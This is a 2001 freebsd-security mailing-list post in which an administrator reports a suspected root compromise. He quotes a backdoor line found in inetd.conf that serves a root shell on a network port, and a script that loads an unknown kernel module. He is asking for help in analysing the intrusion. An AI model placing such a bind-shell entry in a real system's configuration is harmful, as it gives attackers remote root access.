Re: strange inetd.conf entry

From: Ralph Huntington (rjh@mohawk.net)
Date: 11/01/01


Date: Thu, 1 Nov 2001 10:23:45 -0500 (EST)
From: Ralph Huntington <rjh@mohawk.net>
To: <freebsd-security@FreeBSD.ORG>

I did find this kernel module, but I have no idea what it is. I presume at
this point that the root shell acquired through inetd was for the purpose
of loading this module. Anyone recognize it? Anyone want it for analysis?

hogan@klink:/etc# ll /usr/bin/joy
-r-xr-xr-x 1 root wheel 100 Jul 4 12:05 /usr/bin/joy

hogan@klink:/etc# cat /usr/bin/joy
#!/bin/sh
# $FreeBSD: src/sys/modules/joy/joy.sh,v 1.5 1999/08/28 00:47:23 peter Exp $

kldload joy

hogan@klink:/etc# ll /modules/joy.ko
-r-xr-xr-x 1 root wheel 6755 Jul 4 12:05 /modules/joy.ko

On Thu, 1 Nov 2001, Ralph Huntington wrote:

> I have that sinking feeling. I discovered this line at the end of
> inetd.conf on one of our servers:
>
> dlip stream tcp nowait root /bin/sh sh -i
>
> Looks like a root compromise. Sure enough, telnet'ing to the dlip port
> provides what *looks* like a root shell, but I don't seem to be able to do
> anything with it. Pretty mysterious.
>
> Can anyone offer a clue? Thanks in advance, Ralph
>
>
>
>
> To Unsubscribe: send mail to majordomo@FreeBSD.org
> with "unsubscribe freebsd-security" in the body of the message
>

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message